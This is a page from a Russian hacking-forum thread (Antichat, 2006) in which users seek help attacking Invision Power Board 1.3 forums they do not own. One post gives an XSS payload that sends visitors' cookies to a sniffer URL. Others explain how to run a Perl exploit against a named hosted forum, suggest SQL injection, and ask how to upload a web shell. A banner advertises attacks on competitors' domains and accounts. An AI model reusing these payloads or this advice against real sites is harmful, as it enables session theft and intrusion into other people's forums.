Про уязвимости в Invision Power Board(U) v1.3 Final...

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Про уязвимости в Invision Power Board(U) v1.3 Final...

Страница 2 из 3

Опции темы

Поиск в этой теме

Опции просмотра

#11

12.08.2006, 16:18

oOLokiOo

Новичок

Регистрация: 08.08.2006

Сообщений: 14

С нами: 10398205

Репутация: 1

Я короче сглупил... Меня спутало - session_id в снифире, я пытался догнать как эту одну строку распихать по (member_id, pass_hash, forum_read)

Теперь я уже в курсе про сесии...

Ладно, к сути:
1.) Примеры с XSS прокатят только в IE?

2.) Я перепробовал все XSS примеры из темы - "Обзор уязвимостей Ipb", (хоть как-то)преобразовался только один (цвет я добавил от себя):
[color=#eef2f7]
[H*TML][E*MAIL][U*RL=wj`=`][/U*RL][/E*MAIL][/c*olor][c*olor=#eef2f7]` style=`background:url(javascript:document.images [1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/c*olor]
, но куки всёравно не отсылаються на снифер

Посмотрел в код страницы:
 [HTML]<A href="http://wj`=`/" target=_blank></A>` style=`background:url(javascript:document.images 1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`
Походу нифига не преобразовалось...
Что делать?
qBiN в своей статье писал что это прокатывает в 9и из 10и форумов, неужели я попвл в 10ый?

З.Ы. Кстати на "моём" форуме есть только таки тэги:
[U*RL][I*MG][E*MAIL][Q*UOTE][C*ODE][L*IST][B*][I*][U*]
Форум - Invision Power Board(U) v1.3 Final
Может поможет чем...

Последний раз редактировалось oOLokiOo; 12.08.2006 в 16:20..

#12

12.08.2006, 16:37

Azazel

Заведующий всем

Регистрация: 17.04.2005

Сообщений: 1,062

С нами: 11087066

Репутация: 561

Если ты видишь код в браузере, значит xss не работает. Без разницы какого цвета.
Ну звёздочки ты убрал разумеется?
Попробуй скульники лучше.
Ты не в 10 попал, просто времени много прошло.

__________________
Full DNS report

#13

12.08.2006, 17:52

oOLokiOo

Новичок

Регистрация: 08.08.2006

Сообщений: 14

С нами: 10398205

Репутация: 1

Цитата:

Сообщение от Azazel

Если ты видишь код в браузере, значит xss не работает. Без разницы какого цвета.

Ясенько...
Но там ведь некоторые тэги попроподали... url вроде пропал...

Цитата:

Сообщение от Azazel

Ну звёздочки ты убрал разумеется?

Ну разумеется

Цитата:

Сообщение от Azazel

Попробуй скульники лучше.

Кого попробовать?

Цитата:

Сообщение от Azazel

Ты не в 10 попал, просто времени много прошло.

Жаль...

#14

12.08.2006, 17:58

Azazel

Заведующий всем

Регистрация: 17.04.2005

Сообщений: 1,062

С нами: 11087066

Репутация: 561

Скульники - это sql инъекции. Это другой тип атаки. Удачи.

__________________
Full DNS report

#15

13.08.2006, 15:20

oOLokiOo

Новичок

Регистрация: 08.08.2006

Сообщений: 14

С нами: 10398205

Репутация: 1

Вообщем поставил я себе Денвер2_ой, скачал эксплоит. И когда я его запускаю вот такие ошибки выдаёт:
loki2004.nm.ru/shot.GIF

Пробовал через батник:
---
start C:\WebServers\usr\bin\Perl.exe C:\ex.pl goodboard.ru /name_of_forum/ 1 0
---
Вообще 0 реакции... открыло консольку и моментом закрыло... Ставил "pause" смотрел, ничего вообще не выдаёт...
Шо за магия такая?...

З.Ы. Кстати я хоть в правильном месте писал имя форума? А то меня сбивает что он называеться не "forum" как в большинстве
случаев, а там идёт так - "http://SOME_NAME.goodboard.ru/"

З.Ы.Ы. За что отвечают последнее / 1 0?

#16

14.08.2006, 01:16

Gho_st

Познающий

Регистрация: 24.06.2005

Сообщений: 79

С нами: 10988375

Репутация: 11

народ форумы
Invision Power Board(U) v1.3 Final
на 0bb.ru/
вообще уязвимы или там уже все дыры прикрыты
если да то какой сплойт юзать.. уже кучу всего перепробывал и безрезультатно

#17

14.08.2006, 11:06

Lesha Lomalkin

Новичок

Регистрация: 16.12.2005

Сообщений: 9

С нами: 10736506

Репутация: 6

Цитата:

start C:\WebServers\usr\bin\Perl.exe C:\ex.pl goodboard.ru /name_of_forum/ 1 0

Помойму нада так:

Цитата:

start C:\WebServers\usr\bin\Perl.exe C:\ex.pl SOME_NAME.goodboard.ru / 1 0

1 и 0 Это помойму зависит от версии движка, для 1.х и для 2.х... Вроде так. Удачи.
Добавлено:
А вообще посмотрел несколько форумов, похоже там скульников нет

Последний раз редактировалось Lesha Lomalkin; 14.08.2006 в 11:16..

#18

14.08.2006, 13:21

Gho_st

Познающий

Регистрация: 24.06.2005

Сообщений: 79

С нами: 10988375

Репутация: 11

воопрос на не прощели просто в cmd указывать путь до эксплоита и команду..
али это только с актив_пером пашет
(ибо с денверовским перлом не проверял)

#19

14.08.2006, 16:29

T3st3R

Новичок

Регистрация: 17.07.2006

Сообщений: 12

С нами: 10430064

Репутация: 13

в стандартном денвере мало пакетов перловых. так что либо качай дополнительно Perl для денвера, либо ActivePerl. второй даже лучше, тк там есть ещё кроме всего прочего документация для перл.

#20

22.08.2006, 22:19

roman_gt

Новичок

Регистрация: 04.04.2006

Сообщений: 21

С нами: 10580764

Репутация: 1

как мне залить шелл на Ipb 1.3 через смайлы и скины не получается можна как нибудь по другому?

Страница 2 из 3

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.	КИНГ	Уязвимости CMS / форумов	17	23.06.2006 15:38
Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос.	dukalis(AwP)	Уязвимости CMS / форумов	14	19.04.2006 19:40
Вопросы по форуму Invision Power Board(U) v1.3 Final © 2003(р)	FRTD	Уязвимости CMS / форумов	50	02.04.2005 02:48
Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final	rsha1988	Уязвимости CMS / форумов	12	15.02.2005 01:44
Вопрос про уязвимости в Invision Power Board(U) v1.3 Final	Майор	Уязвимости CMS / форумов	15	14.01.2005 14:20

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход